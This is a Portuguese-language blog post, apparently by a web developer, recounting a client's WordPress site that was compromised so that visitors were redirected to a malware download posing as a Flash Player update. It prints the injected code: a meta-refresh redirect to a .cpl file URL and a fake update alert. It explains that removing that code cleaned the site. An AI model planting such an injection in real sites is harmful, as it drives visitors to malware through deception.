Malware

No Seu wordpress foi modificado?
Está redirecionado para outro site ou pior para um link com um arquivo infectado?

Malware

no WordPress

O google te disparou um alerta e agora, o Google não deixa seus visitante entrarem no seu site… dizendo que está infectado por um Malware? Que cliente voltaria a acessa-lo?Malware no WordPress

O Google detectou que algumas páginas de seu site http://www.seusite.com.br/ podem infectar os computadores dos usuários com software destinado a acessar informações confidenciais (malware) ou até mesmo danificar os computadores.

E mais, que o Google Adwords bloqueou todos os anuncios deste cliente. Obvio por causa do malware.

Tive o disprivilégio de isso acontecer comigo. Em um site de um cliente.
Todos que tentavam acessar o Google colocava um aviso ou no Google Chrome aparecia uma tela vemelha… dizendo vá embora… aqui é perigoso. Este site instala um software que pode danificar seu computador (malware).

O wordpress desse cliente estava intacto, mas quando você acessava o site (mesmo o admin) era redirecionado para o dominio http://www.premiado2013.com.br, no link: http://www.premiado2013.com.br/install_reader11_br_mssa_aaa_aih.cpl .

Cruel pois é um script mal intencionado. Fora a mensagem que dizia que o Flash iria ser atualizado automaticamente. (isso em POP-UP).

'Este site Requer Adobe® Flash® Player 2013, O download Automaticamente Será iniciado'

 

Analizando o ocorrido, ele alterou alguns arquivos do WordPress: Index.php, wp-activate.php e wp-blog-header.php tudo na rais do WordPress.

Após as analizes para ver o estrago, foi fácil resolver.
Só apagar esta linha

"<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW">
<meta http-equiv="REFRESH" content="2;url=http://www.premiado2013.com.br/install_reader11_br_mssa_aaa_aih.cpl">
<script type="text/javascript">
alert('Este site Requer Adobe® Flash® Player 2013, O download Automaticamente Será iniciado');
</script>
</script>
</body>"

dos arquivos modificados.

Não sei dizer como isso foi feito.

Estou monitorando e deixo vocês atualizados sobre novas informações.

Abraços.

Link Solicitar Verificação do Google: Clique aqui

E voce já passou por isso? sabe a solução para esse malware?  tem idéia de como ele pode ter alterado meus arquivos? deixe seu comentário.

Espalhe o Artigo